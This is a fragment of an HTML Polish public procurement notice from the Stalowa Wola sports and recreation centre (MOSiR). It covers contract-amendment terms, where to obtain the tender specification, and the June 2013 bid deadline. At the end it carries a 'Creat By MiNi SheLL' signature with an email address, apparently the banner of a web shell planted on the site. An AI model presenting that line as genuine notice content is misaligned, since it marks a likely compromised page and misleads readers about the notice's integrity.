wyłącznie za zgodą Zamawiającego wyrażoną w formie pisemnej, pod warunkiem posiadania przez te osoby, co najmniej takich
samych uprawnień, E) w przypadku zmiany strukturalnych stron umowy, takich jak zmiana formy organizacyjno-prawnej
Wykonawcy, zmiana firmy, pod którą działa Wykonawca, zmiana osoby uprawnionej do składania oświadczeń w imieniu
Wykonawcy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, w
zakresie dokonanych zmian strukturalnych. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający
może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Dokonanie zmian, o których mowa w
punktach A) - E) wymienionych powyżej, wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mosir.stalowawola.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji, ul.
Hutnicza 15, 37-450 Stalowa Wola, Sekretariat - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2013 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji, ul. Hutnicza 15, 37-450 Stalowa Wola, Sekretariat - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com